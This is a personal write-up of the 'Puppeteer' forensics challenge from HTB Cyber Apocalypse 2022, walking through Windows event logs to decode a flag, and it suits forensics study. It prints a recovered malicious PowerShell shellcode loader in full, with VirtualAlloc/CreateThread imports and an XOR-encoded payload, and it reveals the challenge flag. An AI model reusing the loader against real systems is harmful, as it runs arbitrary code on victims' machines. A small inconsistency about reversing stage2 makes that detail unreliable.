
Hello, I am Justayo1337 and today I have a writeup for the HTB Cyber Apocalypse CTF 2022. I will focus on the two Forensics challenges I had time to take a look at during the allotted time for the CTF, starting with the Puppeteer challenge in this writeup. Alright! leggoooooo............ The file for the challenge can be downloaded from here.
So, when we unzip the challenge file, we see a Logs folder. Within that folder are lots of .evtx files, which is the common extension for Event Log files on Windows.

First Look

My first instinct was to open all the files with the Event Viewer utility on Windows. But after taking another look at the folder I noticed a pattern in the file sizes, and went on to open only the files that were not 68KB in size, as I believed the 68KB ones would not contain important data. I only ended up opening these:


I made sure to focus more on the logs with PowerShell or shell in the file name, due to the challenge name, Puppeteer. I found the most interesting piece of data within the file named “Microsoft-Windows-PowerShell%4Operational.evtx”.


Scrolling through, the log file contained an interesting encoded PowerShell script. I later removed some parts of the code that I deemed not useful in understanding the main part of the script, but the original code is as follows:

$OleSPrlmhB = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@
[byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3;
[byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1;
$tNZvQCljVk = Add-Type -memberDefinition $OleSPrlmhB -Name "Win32" -namespace Win32Functions -passthru;
[Byte[]] $HVOASfFuNSxRXR = 0x2d,0x99,0x52,0x35,0x21,0x39,0x1d,0xd1,0xd1,0xd1,0x90,0x80,0x90,0x81,0x83,0x99,0xe0,0x03,0xb4,0x99,0x5a,0x83,0xb1,0x99,0x5a,0x83,0xc9,0x80,0x87,0x99,0x5a,0x83,0xf1,0x99,0xde,0x66,0x9b,0x9b,0x9c,0xe0,0x18,0x99,0x5a,0xa3,0x81,0x99,0xe0,0x11,0x7d,0xed,0xb0,0xad,0xd3,0xfd,0xf1,0x90,0x10,0x18,0xdc,0x90,0xd0,0x10,0x33,0x3c,0x83,0x99,0x5a,0x83,0xf1,0x90,0x80,0x5a,0x93,0xed,0x99,0xd0,0x01,0xb7,0x50,0xa9,0xc9,0xda,0xd3,0xde,0x54,0xa3,0xd1,0xd1,0xd1,0x5a,0x51,0x59,0xd1,0xd1,0xd1,0x99,0x54,0x11,0xa5,0xb6,0x99,0xd0,0x01,0x5a,0x99,0xc9,0x81,0x95,0x5a,0x91,0xf1,0x98,0xd0,0x01,0x32,0x87,0x99,0x2e,0x18,0x9c,0xe0,0x18,0x90,0x5a,0xe5,0x59,0x99,0xd0,0x07,0x99,0xe0,0x11,0x90,0x10,0x18,0xdc,0x7d,0x90,0xd0,0x10,0xe9,0x31,0xa4,0x20,0x9d,0xd2,0x9d,0xf5,0xd9,0x94,0xe8,0x00,0xa4,0x09,0x89,0x95,0x5a,0x91,0xf5,0x98,0xd0,0x01,0xb7,0x90,0x5a,0xdd,0x99,0x95,0x5a,0x91,0xcd,0x98,0xd0,0x01,0x90,0x5a,0xd5,0x59,0x90,0x89,0x90,0x89,0x8f,0x88,0x99,0xd0,0x01,0x8b,0x90,0x89,0x90,0x88,0x90,0x8b,0x99,0x52,0x3d,0xf1,0x90,0x83,0x2e,0x31,0x89,0x90,0x88,0x8b,0x99,0x5a,0xc3,0x38,0x9a,0x2e,0x2e,0x2e,0x8c,0x98,0x6f,0xa6,0xa2,0xe3,0x8e,0xe2,0xe3,0xd1,0xd1,0x90,0x87,0x98,0x58,0x37,0x99,0x50,0x3d,0x71,0xd0,0xd1,0xd1,0x98,0x58,0x34,0x98,0x6d,0xd3,0xd1,0xd4,0xe8,0x11,0x79,0xd1,0xc3,0x90,0x85,0x98,0x58,0x35,0x9d,0x58,0x20,0x90,0x6b,0x9d,0xa6,0xf7,0xd6,0x2e,0x04,0x9d,0x58,0x3b,0xb9,0xd0,0xd0,0xd1,0xd1,0x88,0x90,0x6b,0xf8,0x51,0xba,0xd1,0x2e,0x04,0xbb,0xdb,0x90,0x8f,0x81,0x81,0x9c,0xe0,0x18,0x9c,0xe0,0x11,0x99,0x2e,0x11,0x99,0x58,0x13,0x99,0x2e,0x11,0x99,0x58,0x10,0x90,0x6b,0x3b,0xde,0x0e,0x31,0x2e,0x04,0x99,0x58,0x16,0xbb,0xc1,0x90,0x89,0x9d,0x58,0x33,0x99,0x58,0x28,0x90,0x6b,0x48,0x74,0xa5,0xb0,0x2e,0x04,0x54,0x11,0xa5,0xdb,0x98,0x2e,0x1f,0xa4,0x34,0x39,0x42,0xd1,0xd1,0xd1,0x99,0x52,0x3d,0xc1,0x99,0x58,0x33,0x9c,0xe0,0x18,0xbb,0xd5,0x90,0x89,0x99,0x58,0x28,0x90,0x6b,0xd3,0x08,0x19,0x8e,0x2e,0x04,0x52,0x29,0xd1,0xaf,0x84,0x99,0x52,0x15,0xf1,0x8f,0x58,0x27,0xbb,0x91,0x90,0x88,0xb9,0xd1,0xc1,0xd1,0xd1,0x90,0x89,0x99,0x58,0x23,0x99,0xe0,0x18,0x90,0x6b,0x89,0x75,0x82,0x34,0x2e,0x04,0x99,0x58,0x12,0x98,0x58,0x16,0x9c,0xe0,0x18,0x98,0x58,0x21,0x99,0x58,0x0b,0x99,0x58,0x28,0x90,0x6b,0xd3,0x08,0x19,0x8e,0x2e,0x04,0x52,0x29,0xd1,0xac,0xf9,0x89,0x90,0x86,0x88,0xb9,0xd1,0x91,0xd1,0xd1,0x90,0x89,0xbb,0xd1,0x8b,0x90,0x6b,0xda,0xfe,0xde,0xe1,0x2e,0x04,0x86,0x88,0x90,0x6b,0xa4,0xbf,0x9c,0xb0,0x2e,0x04,0x98,0x2e,0x1f,0x38,0xed,0x2e,0x2e,0x2e,0x99,0xd0,0x12,0x99,0xf8,0x17,0x99,0x54,0x27,0xa4,0x65,0x90,0x2e,0x36,0x89,0xbb,0xd1,0x88,0x98,0x16,0x13,0x21,0x64,0x73,0x87,0x2e,0x04;
$hRffYLENA = $tNZvQCljVk::VirtualAlloc(0,[Math]::Max($HVOASfFuNSxRXR.Length,0x1000),0x3000,0x40);
$stage3 = $stage1 + $stage2;
[System.Runtime.InteropServices.Marshal]::Copy($HVOASfFuNSxRXR,0,$hRffYLENA,$HVOASfFuNSxRXR.Length);
# Unpack Shellcode;
for($i=0; $i -lt $HVOASfFuNSxRXR.count; $i++) { $HVOASfFuNSxRXR[$i] = $HVOASfFuNSxRXR[$i] -bxor 0xd1; }
#Unpack Special Orders!
for($i=0;$i -lt $stage3.count;$i++){ $stage3[$i] = $stage3[$i] -bxor 0xd1; }

I removed the parts that were not as useful and reworked the script to:

[byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3;
[byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1;

# stage2 is stored back to front; flip it before joining the two halves
[array]::Reverse($stage2)
$stage3 = $stage1 + $stage2;
for($i=0;$i -lt $stage3.count;$i++){ $stage3[$i] = $stage3[$i] -bxor 0xd1; }

Write-Output -InputObject $stage3

This script gave me the answer to the challenge. The script creates two variables, stage1 and stage2, which hold arrays of byte values. The values in stage2 are reversed, as in the original script, and the two arrays are then concatenated and stored in the stage3 variable. The stage3 array is then looped over and each value is XORed with the hex value 0xd1; the result replaces the original value in stage3. Finally, I write out the decimal values and put them into CyberChef to get the flag: HTB{b3wh4r3_0f_th3_b00t5_0f_just1c3…}
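As an added example (not part of the write-up), a small Python helper that automates the decode step a responder would otherwise do by hand: it pulls every `[byte[]] $name = 0x..` literal and the `-bxor` key out of a logged script block, XORs each array, and stitches the flag with stage2 reversed as described above. The script-block text is a constructed excerpt containing the two arrays and the unpack loop quoted on the page; the function names are my own.

```python
import re

# Constructed excerpt of the logged script block: the two flag-carrying
# arrays and the XOR key are exactly as quoted in the write-up.
SCRIPT_BLOCK = r"""
[byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3;
[byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1;
$stage3 = $stage1 + $stage2;
for($i=0;$i -lt $stage3.count;$i++){ $stage3[$i] = $stage3[$i] -bxor 0xd1; }
"""

# "[byte[]] $name = 0x.., 0x.., ..." (case-insensitive, may span lines)
ARRAY_RE = re.compile(r"\[byte\[\]\]\s*\$(\w+)\s*=\s*((?:0x[0-9a-f]{1,2}\s*,?\s*)+)", re.I)
# the single-byte key used by the unpack loop, e.g. "-bxor 0xd1"
KEY_RE = re.compile(r"-bxor\s+(0x[0-9a-f]{1,2}|\d{1,3})", re.I)


def extract_byte_arrays(script: str) -> dict[str, bytes]:
    """Return every literal byte array in the script block, keyed by variable name."""
    arrays = {}
    for name, body in ARRAY_RE.findall(script):
        tokens = re.findall(r"0x[0-9a-f]{1,2}", body, re.I)
        arrays[name] = bytes(int(tok, 16) for tok in tokens)
    return arrays


def extract_xor_key(script: str) -> int:
    """Return the -bxor key, or raise if the script has no such unpack loop."""
    m = KEY_RE.search(script)
    if m is None:
        raise ValueError("no -bxor key found in script block")
    return int(m.group(1), 0)


def xor_decode(data: bytes, key: int) -> bytes:
    """Single-byte XOR, the same operation the unpack loop performs."""
    return bytes(b ^ key for b in data)


def recover_flag(script: str) -> str:
    """Decode stage1 and stage2 and join them; stage2 is stored reversed."""
    key = extract_xor_key(script)
    decoded = {n: xor_decode(v, key) for n, v in extract_byte_arrays(script).items()}
    return (decoded["stage1"] + decoded["stage2"][::-1]).decode("ascii")


if __name__ == "__main__":
    print(recover_flag(SCRIPT_BLOCK))
```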


P.S.: One could also use this instead of writing out the decimal values and decoding them on an external site like CyberChef:

$op = [char[]]@($stage3)
$op -join ''


Thanks for reading!!!